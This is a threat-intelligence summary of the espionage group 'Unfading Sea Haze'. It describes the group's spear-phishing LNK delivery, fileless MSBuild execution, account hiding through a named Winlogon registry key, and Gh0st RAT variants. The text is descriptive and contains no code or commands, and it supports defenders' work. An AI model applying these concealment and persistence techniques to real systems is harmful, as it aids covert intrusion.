Tracing a Persistent Threat with Unfading Sea Haze’s Stealthy Cyber Tactics

A persistent threat group identified as "Unfading Sea Haze" has been targeting government and military organizations primarily in South China Sea countries since at least 2018. According to Bitdefender researchers, this group's operations align closely with Chinese geopolitical interests, focusing on intelligence collection and sustained espionage. Unfading Sea Haze has compromised at least eight victims, demonstrating stealth capabilities in their intrusions, as an "extended period of Unfading Sea Haze’s invisibility, exceeding five years," was noted by researchers. This group's persistence is also evident by breaches due to "poor credential hygiene and inadequate patching practices," enabling the attackers to reestablish their foothold.

Among the attack methods observed, Unfading Sea Haze often initiates attacks through spear-phishing emails with malicious ZIP archives. These archives contain LNK files that appear benign but execute malicious commands when executed. A common tactic includes embedding extensive, deceptive comments within the LNK file's command line to evade detection. This includes checks for specific security processes; if absent, the attack proceeds with PowerShell scripts that deploy fileless malware directly into memory using tools like MSBuild.exe. This approach leaves minimal forensic evidence by executing code from remote SMB servers to maintain stealth. Another aspect of their strategy involves persistence techniques, demonstrated by manipulating local accounts and creating scheduled tasks that blend in with legitimate system operations. They manipulate accounts by enabling deactivated accounts, resetting passwords, and hiding accounts by modifying the HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList registry key.

Unfading Sea Haze's arsenal showcases their cyber espionage capabilities through an array of custom malware, including several strains of Gh0st RAT tailored for specific operational needs. The earliest variant, SilentGh0st, was a detectable yet powerful tool due to its wide range of commands and modules. It evolved into InsidiousGh0st, which reduced redundancy and introduced enhancements from C++ to C# and Go, improving features like SOCKS5, TCP proxy support, and PowerShell integration. The more recent strains, TranslucentGh0st, EtherealGh0st, and FluffyGh0st, adopt a modular approach to minimize their footprint and enhance stealth through dynamic plugin loading. Regarding data exfiltration, the threat actors previously used a custom tool named "DustyExfilTool." Recent campaigns have seen them incorporate the curl utility and FTP protocol for data exfiltration. Their adaptability ensures that their operations remain covert and resilient against various targets.

Unfading Sea Haze represents a highly organized and elusive cyber threat actor, primarily engaged in espionage within critical sectors. Bitdefender's report offers insight on the group's use of advanced techniques such as fileless attacks and modular malware, and aiding defenders in identifying essential detections for monitoring. Organizations in the targeted regions and sectors should adopt comprehensive security measures, including regular patching, credential management, and enhanced monitoring, to mitigate the risks posed by these advanced threats. The potential links to APT41, suggested by overlaps in their toolsets, further emphasize the need for vigilance.